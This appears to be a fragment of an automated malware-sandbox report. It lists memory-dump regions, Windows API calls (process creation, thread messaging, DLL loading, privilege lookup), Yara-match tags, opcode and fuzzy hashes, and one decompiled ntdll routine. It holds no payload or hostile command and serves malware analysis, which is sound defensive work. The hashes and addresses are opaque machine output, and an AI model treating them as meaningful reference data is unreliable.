                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 69c2e4fac2635376e37ba931f3fb29dcb4da9f584f0807c12eb5ad3bbd11b87f
                                                  • Instruction ID: b7d651d2b6f38da9957eb909f20ca66fd29b0326292d544f413a5ba53277986a
                                                  • Opcode Fuzzy Hash: 69c2e4fac2635376e37ba931f3fb29dcb4da9f584f0807c12eb5ad3bbd11b87f
                                                  • Instruction Fuzzy Hash: 479002B120504882F54075594505A56005D97D0349F51C021A0055694DA6A5DD55B6B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4a38d321f73bf1ae08b1d2b519f7d35534feb8b793ec4181e89ea29d54a0bd17
                                                  • Instruction ID: 2c993f76c562edae348d6e4f3cd92925e6bff105cb48d4402da1d7f3dd2a466a
                                                  • Opcode Fuzzy Hash: 4a38d321f73bf1ae08b1d2b519f7d35534feb8b793ec4181e89ea29d54a0bd17
                                                  • Instruction Fuzzy Hash: 409002A121180082F60069694D15B17004D97D0347F51C125A0145554CD995DC616571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6032b1c9cef4912a16493c93e501cc449e27be86d8462885c56cc20a9555b0d9
                                                  • Instruction ID: 13e9f8d1d63d5ad93c04461c342634f2d9da3c957b7c74adc4c6278e8e822ae1
                                                  • Opcode Fuzzy Hash: 6032b1c9cef4912a16493c93e501cc449e27be86d8462885c56cc20a9555b0d9
                                                  • Instruction Fuzzy Hash: 4F9002B120108842F5106559850575A004D97D0345F55C421A4415658D96D5DC917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a398ddb86e3c3cab4cc4cd96dcb50a2520a288bb0e9d84c1a0f2f908e80449e2
                                                  • Instruction ID: abb175d97814a5c583d61ce57160745ec8ca1076e98e1fc98946e1992270de4e
                                                  • Opcode Fuzzy Hash: a398ddb86e3c3cab4cc4cd96dcb50a2520a288bb0e9d84c1a0f2f908e80449e2
                                                  • Instruction Fuzzy Hash: B09002B120100882F50065594505B56004D97E0345F51C026A0115654D9695DC517571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a0d36512a7181614158a1a522f116f9e13ee0e62863b6ada2386fe6debf74412
                                                  • Instruction ID: 496f85c8b7d0b043f18f7be08114dc250acf6d1ee0b076e5c1c2e412ba915c11
                                                  • Opcode Fuzzy Hash: a0d36512a7181614158a1a522f116f9e13ee0e62863b6ada2386fe6debf74412
                                                  • Instruction Fuzzy Hash: E99002B120100442F50069995509656004D97E0345F51D021A5015555ED6E5DC917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f61f6cc4bf382808a9b337576191baf86398d371cee184ffd04b64dd1f0c0611
                                                  • Instruction ID: 5668487d4d264ac1bc60edbaf77c270ff302964de96fe6412529c5f4e44e6b2e
                                                  • Opcode Fuzzy Hash: f61f6cc4bf382808a9b337576191baf86398d371cee184ffd04b64dd1f0c0611
                                                  • Instruction Fuzzy Hash: D19002B131114442F51065598505716004D97D1245F51C421A0815558D96D5DC917172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ce04a898f6101d1794009ec8fa788776a97ffe408e43b2c4fda53db126c482c
                                                  • Instruction ID: 2eb7e6b13992cd1e79938971c028c0ad662f7f56db6354b6c5f8608f73bbcf74
                                                  • Opcode Fuzzy Hash: 8ce04a898f6101d1794009ec8fa788776a97ffe408e43b2c4fda53db126c482c
                                                  • Instruction Fuzzy Hash: BC9002A921300042F5807559550961A004D97D1246F91D425A0006558CD995DC696371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFreeHeapInternalProcess
                                                  • String ID: .z`
                                                  • API String ID: 1438695366-1441809116
                                                  • Opcode ID: 90c160840e02278545702d0915215471d885d0144c954935cf438603df58f7ba
                                                  • Instruction ID: f379709604604de043309c2262b19ceaaed2e277cfb7c3b69f512210fc5dd530
                                                  • Opcode Fuzzy Hash: 90c160840e02278545702d0915215471d885d0144c954935cf438603df58f7ba
                                                  • Instruction Fuzzy Hash: 4F1129B2204209BBDB14DFA8DC84EEB77ADEF88750F058659FA0C97241D630E915CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02977398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 50492d0dbda04b2cb5e117d9845e961fee4babb36efbd713bebedc9de0916669
                                                  • Instruction ID: 16b4fe9ddd58a23e7ce43439dc420ac60222ae57231f1c9b0a482479873a51f2
                                                  • Opcode Fuzzy Hash: 50492d0dbda04b2cb5e117d9845e961fee4babb36efbd713bebedc9de0916669
                                                  • Instruction Fuzzy Hash: 123192B6641704ABC715DFA4D8A0FABB7B9BF88704F00851DFA1A5B241D730A445CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02977398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: bb7dca2a574678c6730806648a2c3eb8eddc1f560d044721c5c1430feb9ebf59
                                                  • Instruction ID: eef75c97eb096181fb2277d4e14ac51402769eba3bc9df8f9d74bffcf2ce2325
                                                  • Opcode Fuzzy Hash: bb7dca2a574678c6730806648a2c3eb8eddc1f560d044721c5c1430feb9ebf59
                                                  • Instruction Fuzzy Hash: 6031B1B2641605ABC711EFA4C8A0FABBBB9BF88704F008429F9199B241D370A455CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 6c86cf10018408c8f8833f0748349ecafde25b092cf818c458cd3e2de167d509
                                                  • Instruction ID: 1fbcde30208ccecddb6590573cc32ead9cc541219afdfea23f6f580bb57f11e3
                                                  • Opcode Fuzzy Hash: 6c86cf10018408c8f8833f0748349ecafde25b092cf818c458cd3e2de167d509
                                                  • Instruction Fuzzy Hash: 36F082B12002146FEB18DFA8DC48EEB77A8EF89324F104A59FD6C97251D231E911CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 0297890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction ID: bf6cefff6cc0d535b62222a2b7d07da47d6e445a6ff640791ba51bf848419c73
                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction Fuzzy Hash: 73E046B1200208AFDB18EF99CC48EA777ADEF88750F018558FE085B241C630F910CAF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029672EA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0296730B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction ID: 5dbcdcd2a8f970e93d9f75d1c0c9133d3640189d106831a866c4bfdeed9ab11d
                                                  • Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction Fuzzy Hash: BF01A231A8022877F721AA949C02FFE77AC9F40B55F154158FF04BA1C0EAA469064BF6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029672EA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0296730B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: b1211adde592bdd3974a86e3140faf6a01633492fc22d546a6a85f028fd0133c
                                                  • Instruction ID: a609e585bfcae317e764b64cfcb869ffb5ebd49fdd70d1cce0ac705dc3d00f4d
                                                  • Opcode Fuzzy Hash: b1211adde592bdd3974a86e3140faf6a01633492fc22d546a6a85f028fd0133c
                                                  • Instruction Fuzzy Hash: 32F0E531AC022832E22115D46D06FFEB3DDDB80F55F140059FF04EB2C0EAD4641507E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02969BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 4a9f4d7cc2de21a2a59c1c6c04bcf380de393013e39651ddca7363bcf16a5d13
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 1A0121B5D4020EABDF10EBE4DC45FEDB7B99B54308F1045A5E90897240F671EB54CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: 8af7829bf28189b9e222edfbc8939e74fa2b51b3ac4a47600c4e123612e5f734
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: 3C01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0296CD00,?,?), ref: 0297745C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                  • Instruction ID: a567aaa89313dd6f34e2f959452894bb6ebc8e3b2e608328d8d45652c35d25e1
                                                  • Opcode Fuzzy Hash: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                  • Instruction Fuzzy Hash: 2AE065333802147AE22065A9AC02FA7B69DDBC1B24F14002AFA0DEA2C0DA95F80146A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029789A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: f35f31085e8118c2a5653f5c355627369c6e7b0c2844810f68138dec3ef4e0cf
                                                  • Instruction ID: 024ad6e5750f38c71eee8c2196fc7102bd3b135f022a7f02b7eeb38f2d21f234
                                                  • Opcode Fuzzy Hash: f35f31085e8118c2a5653f5c355627369c6e7b0c2844810f68138dec3ef4e0cf
                                                  • Instruction Fuzzy Hash: EDE076B2214009AF8B08CF89EC90CEB73EEAF8C314B118608BA0DD3200D630E8118BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0296CFD2,0296CFD2,?,00000000,?,?), ref: 02978A70
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: e17093ba378509a46846d32bbba1c678add93aac60e071e6e2f4b79e7cea0aa2
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: BFE01AB12002086BDB14DF49CC84EE737ADEF88650F018154BE0857241C930E8108BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02973546,?,02973CBF,02973CBF,?,02973546,?,?,?,?,?,00000000,00000000,?), ref: 029788CD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction ID: 4937dabb59f61a355b7174f9aae48596b30bfb901fda578e0572bf6240c6dec3
                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                  • Instruction Fuzzy Hash: C8E012B1200208ABDB18EF99CC44EA777ADEF88650F118558BE085B241C630F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02967C93,?), ref: 0296D46B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction ID: 44e1741853714ff3bcbfecab6e704c1caa97256c457606dcd184b49bec81f6d2
                                                  • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction Fuzzy Hash: CED0A7717503087BE610FAA89C07F2632CD5B84B04F494064F94DD73C3DA50F4004575
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02969BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction ID: 718688f60a12a3078948cc8a75891898ca758498b7f2a3dbb7f969b471a7a61f
                                                  • Opcode Fuzzy Hash: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction Fuzzy Hash: 11D0A72050E2887F9B26C668581996DFFA4EF91110B08CAEEC889AB2C3C5304909C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6063949790a8030f1e24fc1614c0a54bbc070f4e190129692670588d5804cc2c
                                                  • Instruction ID: 7856a43b0f4a27b3f7fd8835372aa626cbd372f5a094cf5fbbc93dde6dd4e675
                                                  • Opcode Fuzzy Hash: 6063949790a8030f1e24fc1614c0a54bbc070f4e190129692670588d5804cc2c
                                                  • Instruction Fuzzy Hash: 34B02BF19010C0C5FB00EB6007087373A0477D0300F12C021D1020240A0378D4C0F1B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 53%
                                                  			E046DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                  				void* _t7;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t13;
                                                  				intOrPtr _t14;
                                                  				intOrPtr* _t15;
                                                  
                                                  				_t13 = __edx;
                                                  				_push(_a4);
                                                  				_t14 =  *[fs:0x18];
                                                  				_t15 = _t12;
                                                  				_t7 = E0468CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                  				_push(_t13);
                                                  				E046D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                  				_t9 =  *_t15;
                                                  				if(_t9 == 0xffffffff) {
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                  				}
                                                  				_push(_t10);
                                                  				_push(_t15);
                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                  				return E046D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                  			}











                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 046DFDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046DFE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046DFE01
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 25cd0b3fbaddd8a6447d984b39f2bc941e61892c57772885b2bef688ed3fe5ed
                                                  • Instruction ID: f67789fe1787184912aa16e7c597e6554e0709cbf64738ff2cc79b4aae9b796f
                                                  • Opcode Fuzzy Hash: 25cd0b3fbaddd8a6447d984b39f2bc941e61892c57772885b2bef688ed3fe5ed
                                                  • Instruction Fuzzy Hash: 22F0F672A00241BFE7341A45DC06F23BB5AEB44B31F244358F628565D1FA62F82096F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%